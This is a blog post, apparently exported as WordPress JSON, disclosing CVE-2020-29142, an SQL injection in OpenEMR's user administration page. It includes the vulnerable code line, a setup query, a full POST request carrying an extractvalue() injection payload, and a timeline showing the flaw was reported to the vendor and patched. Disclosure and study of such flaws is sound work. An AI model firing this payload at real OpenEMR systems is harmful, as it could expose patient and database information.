{"id":90,"date":"2021-02-15T01:54:52","date_gmt":"2021-02-14T19:54:52","guid":{"rendered":"https:\/\/murat.one\/?p=90"},"modified":"2021-02-15T02:28:52","modified_gmt":"2021-02-14T20:28:52","slug":"cve-2020-29142-sql-injection-vulnerability-in-interface-usergroup-usergroup_admin-php-in-openemr-6-0-0-dev-5-0-25","status":"publish","type":"post","link":"https:\/\/murat.one\/?p=90","title":{"rendered":"CVE-2020-29142. SQL injection vulnerability in OpenEMR 6.0.0-dev, 5.0.2(5)"},"content":{"rendered":"\n<p><a><strong>Product:<\/strong><\/a> OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)<\/p>\n\n\n\n<p><strong>Vulnerability:<\/strong> SQL injection<\/p>\n\n\n\n<p><strong>Discovered:<\/strong> Kutlymurat Mambetniyazov (@manfromkz)<\/p>\n\n\n\n<p><strong>Acknowledgements: <\/strong>NitroTeam.kz<\/p>\n\n\n\n<p><strong>Date:<\/strong> 11\/24\/2020<\/p>\n\n\n\n<p><strong>Description: <\/strong>Ineffective use of add_escape_custom() in interface\/usergroup\/usergroup_admin.php leads to SQL injection: the escaped value is concatenated unquoted into an IN (...) list, so escaping quote characters does not prevent injection.<\/p>\n\n\n\n<p><strong>Requirements: <\/strong>the global setting restrict_user_facility = on and an administrator account<\/p>\n\n\n\n<p><strong>Tested on: <\/strong>Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 for OpenEMR 5.0.2(5) and PHP 7.4 for OpenEMR 6.0.0-dev<\/p>\n\n\n\n<p><strong>Vulnerable code: <\/strong>interface\/usergroup\/usergroup_admin.php:150<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>and facility_id not in (\" . add_escape_custom(implode(\",\", $_POST&#91;'schedule_facility'])) . \")\", array($_POST&#91;\"id\"]));<\/code><\/pre>\n\n\n\n<p><strong>Steps to reproduce<\/strong>:<\/p>\n\n\n\n<p>1. Run the SQL query to meet the requirements:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>UPDATE `globals` SET `gl_value` = '1' WHERE `globals`.`gl_name` = 'restrict_user_facility'<\/code><\/pre>\n\n\n\n<p>2. 
Send the following POST request (replace the Host, csrf_token_form and OpenEMR cookie values with those of your own administrator session):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/interface\/usergroup\/usergroup_admin.php HTTP\/1.1\nHost: openemr60.kz\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 420\nConnection: close\nCookie: OpenEMR=FolYY6Y6%2CNwDDANwci5GfRdQXosr2ZkZ76e7PNHPJGTTc-eD; \n\ncsrf_token_form=639ee383724ab4de7bd56e47a454ea96cadeb6de&amp;pre_active=1&amp;get_admin_id=0&amp;admin_id=&amp;check_acl=&amp;mname=&amp;lname=Administrator&amp;facility_id=3&amp;taxid=&amp;drugid=&amp;upin=&amp;see_auth=1&amp;npi=&amp;job=&amp;main_menu_role=standard&amp;patient_menu_role=standard&amp;access_group%5B%5D=Administrators&amp;comments=&amp;id=1&amp;mode=update&amp;privatemode=user_admin&amp;secure_pwd=1&amp;schedule_facility&#91;]=1&amp;schedule_facility&#91;]=extractvalue(0x0a,concat(0x0a,(user())))<\/code><\/pre>\n\n\n\n<p>Screenshot for 6.0.0-dev:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"463\" src=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-5-1024x463.png\" alt=\"\" class=\"wp-image-91\" srcset=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-5-1024x463.png 1024w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-5-300x136.png 300w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-5-768x347.png 768w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-5.png 1361w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Screenshot for 5.0.2(5):<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"447\" src=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-6-1024x447.png\" alt=\"\" class=\"wp-image-92\" 
srcset=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-6-1024x447.png 1024w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-6-300x131.png 300w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-6-768x335.png 768w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-6.png 1394w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Timeline of the vulnerability:<\/p>\n\n\n\n<p>11\/24\/2020 \u2013 vulnerability discovered<br>11\/24\/2020 \u2013 notification to vendor<br>11\/25\/2020 \u2013 confirmation by vendor<br>11\/27\/2020 \u2013 reservation of CVE ID at MITRE<br>01\/07\/2021 \u2013 patch release<br>02\/15\/2021 \u2013 published<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ineffective use of add_escape_custom() in interface\/usergroup\/usergroup_admin.php leads to SQL injection in OpenEMR 6.0.0-dev, 5.0.2(5).<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[10,14],"tags":[18,15,17,16],"_links":{"self":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/90"}],"collection":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=90"}],"version-history":[{"count":4,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/90\/revisions"}],"predecessor-version":[{"id":109,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/90\/revisions\/109"}],"wp:attachment":[{"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=90"}],"wp:term":[{"taxonomy":"category","embedd
able":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=90"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=90"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}